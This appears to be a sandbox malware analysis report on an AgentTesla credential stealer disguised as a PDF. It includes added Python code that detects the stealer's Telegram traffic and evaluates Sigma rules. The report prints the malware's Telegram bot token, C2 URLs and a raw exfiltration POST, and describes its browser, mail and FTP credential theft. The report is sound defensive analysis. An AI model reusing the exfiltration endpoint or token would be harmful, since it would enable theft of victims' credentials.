
Windows Analysis Report 20220114080343434.pdf.exe

Overview

General Information

Sample Name:20220114080343434.pdf.exe
Analysis ID:553218
MD5:cd9290d22bb18ced32a1b81814888382
SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Uses an obfuscated file name to hide its real file extension (double extension)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 20220114080343434.pdf.exe (PID: 4616 cmdline: "C:\Users\user\Desktop\20220114080343434.pdf.exe" MD5: CD9290D22BB18CED32A1B81814888382)
    • RegSvcs.exe (PID: 6500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 1496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}
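The two configuration blocks above carry the same Telegram bot token, used once for `sendMessage` and once for `sendDocument`. The following is an added example, not code from the report or from the malware, that turns that configuration into pivotable indicators (the numeric bot id is the stable part, the secret after the colon is the credential the operator can rotate) and runs a detection over web-proxy log lines. The two C2 URLs are copied from the report; the log format (timestamp, client IP, method, URL, User-Agent or "-") and the log lines themselves are constructed for the example.

```python
"""
Added example: derive indicators from the extracted AgentTesla / Telegram RAT
configuration and flag matching Bot API calls in proxy logs.
The C2 URLs are from the report; the log lines are constructed.
"""
import re
from urllib.parse import urlsplit

# Configuration as the report's Malware Configuration Extractor emitted it.
EXTRACTED_CONFIG = {
    "Telegram RAT": {
        "C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage",
    },
    "Agenttesla": {
        "Exfil Mode": "Telegram",
        "Chat id": "2124798776",
        "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument",
    },
}

# A Bot API path is /bot<numeric bot id>:<secret>/<method>.  The bot id is the
# stable pivot (it survives a token rotation); the secret is the credential.
BOT_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>\w+)")


def parse_c2_url(url):
    """Return bot id, secret and API method for a Telegram Bot API URL, else None."""
    parts = urlsplit(url)
    match = BOT_PATH_RE.match(parts.path)
    if parts.hostname != "api.telegram.org" or match is None:
        return None
    return {"bot_id": match["bot_id"], "secret": match["secret"], "method": match["method"]}


def indicators_from_config(config):
    """Map each bot id found in the extracted config to the API methods it is used with."""
    iocs = {}
    for fields in config.values():
        for value in fields.values():
            if isinstance(value, str) and value.startswith("https://"):
                c2 = parse_c2_url(value)
                if c2:
                    iocs.setdefault(c2["bot_id"], set()).add(c2["method"])
    return iocs


# Constructed proxy log lines from a TLS-inspecting proxy (full URL visible).
LOG_LINES = [
    "2022-01-14T08:05:10Z 192.168.2.3 POST https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument -",
    "2022-01-14T08:05:12Z 192.168.2.3 POST https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage -",
    "2022-01-14T08:06:00Z 192.168.2.7 GET https://api.telegram.org/bot999999999:AAEabcdefghijklmnopqrstuvwxyz0123456/getUpdates python-requests/2.26.0",
    "2022-01-14T08:06:05Z 192.168.2.9 GET https://www.fontbureau.com/designers/ Mozilla/5.0",
]


def detect(log_lines, known_bot_ids):
    """Flag every Bot API call; escalate when the bot id matches the extracted config."""
    findings = []
    for line in log_lines:
        _ts, client, _method, url, user_agent = line.split()
        c2 = parse_c2_url(url)
        if c2 is None:
            continue
        reasons = []
        if c2["bot_id"] in known_bot_ids:
            severity = "high"
            reasons.append("bot id matches the AgentTesla configuration")
        else:
            # End-user Telegram clients speak MTProto, not the HTTPS Bot API,
            # so any Bot API call from a workstation deserves a look.
            severity = "medium"
            reasons.append("unexpected Telegram Bot API use from a workstation")
        if user_agent == "-":
            reasons.append("request without a User-Agent header")
        findings.append({"client": client, "bot_id": c2["bot_id"],
                         "method": c2["method"], "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    iocs = indicators_from_config(EXTRACTED_CONFIG)
    for finding in detect(LOG_LINES, set(iocs)):
        print(finding)
```

The full URL is only visible when the proxy decrypts TLS; without inspection the only network observable is the SNI/DNS name api.telegram.org, and the report shows the connection landing on 149.154.167.220, a Telegram address shared with legitimate traffic, so blocking by IP or hostname affects legitimate Telegram use. The missing User-Agent check mirrors the report's "HTTP GET or POST without a user agent" signature and the raw request shown in the Networking section.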

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(21 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author
0.2.20220114080343434.pdf.exe.3edcc90.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.20220114080343434.pdf.exe.3edcc90.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.20220114080343434.pdf.exe.3e74280.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.20220114080343434.pdf.exe.3e74280.3.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
8.0.RegSvcs.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(17 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 4616, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6500
Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 4616, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6500
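Both Sigma hits fire on the same event: the .NET utility RegSvcs.exe started with no arguments at all by a process on the user's Desktop whose name ends in ".pdf.exe". The following is an added example, not part of the report and not the Sigma project's own rule code, that evaluates the logic of those two rules against process-creation events and then scores a hit by the parent-process context the report shows. The first event carries the field values from the report; the other two events are constructed. The binary-name lists approximate the public rules' selections and are assumptions, not copies of the rules.

```python
"""
Added example: evaluate the two Sigma rules' logic on process-creation events
and enrich hits with parent-process context.  Event 1 is from the report, the
other events are constructed; the LOLBIN lists are approximations.
"""
import ntpath
import re

# Binaries the "sacrificial process" rule treats as suspicious when they run
# with no arguments at all (approximation of the public rule's list).
SACRIFICIAL = {"regsvcs.exe", "regasm.exe", "regsvr32.exe", "rundll32.exe", "werfault.exe"}

# Binaries the "Possible Applocker Bypass" rule looks for in the command line.
APPLOCKER_BYPASS = {"msdt.exe", "installutil.exe", "regsvcs.exe", "regasm.exe",
                    "regsvr32.exe", "msbuild.exe", "ieexec.exe", "mshta.exe"}

TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
DOUBLE_EXTENSION = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)\.exe$", re.IGNORECASE)


def bad_opsec_sacrificial_process(event):
    """Image is a known LOLBIN and the command line is nothing but the image path."""
    if ntpath.basename(event["Image"]).lower() not in SACRIFICIAL:
        return False
    bare = event["CommandLine"].strip().strip('"').lower()
    return bare == event["Image"].lower()


def possible_applocker_bypass(event):
    """Command line references one of the AppLocker-bypass capable binaries."""
    command_line = event["CommandLine"].lower()
    return any(name in command_line for name in APPLOCKER_BYPASS)


def parent_context(event):
    """Return the reasons the parent process itself looks suspicious."""
    parent = event["ParentImage"]
    flags = []
    if not parent.lower().startswith(TRUSTED_PARENT_DIRS):
        flags.append("parent outside Windows or Program Files")
    if DOUBLE_EXTENSION.search(ntpath.basename(parent)):
        flags.append("parent uses a double extension")
    return flags


def evaluate(events):
    """Apply both rules to every event and score hits by parent context."""
    alerts = []
    for event in events:
        rules = []
        if bad_opsec_sacrificial_process(event):
            rules.append("Bad Opsec Defaults Sacrificial Processes With Improper Arguments")
        if possible_applocker_bypass(event):
            rules.append("Possible Applocker Bypass")
        if not rules:
            continue
        flags = parent_context(event)
        if len(rules) == 2 and flags:
            severity = "high"      # argument-less LOLBIN spawned by an odd parent
        elif flags:
            severity = "medium"
        else:
            severity = "low"       # e.g. a developer registering a component
        alerts.append({"ProcessId": event["ProcessId"], "rules": rules,
                       "parent_flags": flags, "severity": severity})
    return alerts


EVENTS = [
    # Field values as the report records them for PID 6500.
    {"ProcessId": 6500,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentProcessId": 4616,
     "ParentImage": r"C:\Users\user\Desktop\20220114080343434.pdf.exe",
     "ParentCommandLine": r'"C:\Users\user\Desktop\20220114080343434.pdf.exe" '},
    # Constructed benign event: RegSvcs.exe registering a component for Visual Studio.
    {"ProcessId": 7001,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "C:\build\MyServicedComponent.dll"',
     "ParentProcessId": 3000,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"'},
    # Constructed benign event: unrelated process.
    {"ProcessId": 7002,
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentProcessId": 1234,
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(alert)
```

The "Possible Applocker Bypass" match on its own is noisy (RegSvcs.exe is a legitimate component-registration tool), which is why the score only rises when the command line has no arguments and the parent is itself anomalous. The report's process tree also shows a second argument-less RegSvcs.exe (PID 1496) under the same parent; the same logic applies to it.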

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}
Source: RegSvcs.exe.1496.8.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}
Machine Learning detection for sample
Source: 20220114080343434.pdf.exe | Joe Sandbox ML: detected
Source: 8.0.RegSvcs.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.RegSvcs.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.RegSvcs.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.RegSvcs.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 20220114080343434.pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: 20220114080343434.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256
    Host: api.telegram.org
    Content-Length: 1009
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443
Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp | String found in binary or memory: http://UeFrqT.com
Source: RegSvcs.exe, 00000008.00000002.557264398.0000000003712000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.veris
Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283885811.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283942441.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283961213.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com(
Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286760496.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286824795.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286816564.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286767765.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286924962.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286942039.0000000005D04000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 20220114080343434.pdf.exe, 00000000.00000003.289190210.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289318058.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289093184.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289252588.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289143103.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288858385.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288983388.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289034401.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com9
Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comesS
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comn-u/
Source: 20220114080343434.pdf.exe, 00000000.00000003.286962308.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.
Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comue
Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comuy
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.290845442.0000000005CF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 20220114080343434.pdf.exe, 00000000.00000003.291923026.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/d
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 20220114080343434.pdf.exe, 00000000.00000003.291515061.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291556929.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291697526.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291598283.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291473881.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291757927.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291647210.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html.$
Source: 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmld
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 20220114080343434.pdf.exe, 00000000.00000003.291078110.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290998503.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291023701.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersR
Source: 20220114080343434.pdf.exe, 00000000.00000003.292082396.0000000005CEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersr
Source: 20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comB.TTF
Source: 20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comiv
Source: 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.c
Source: 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn9
Source: 20220114080343434.pdf.exe, 00000000.00000003.286148512.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286200312.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnP
Source: 20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnTC
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
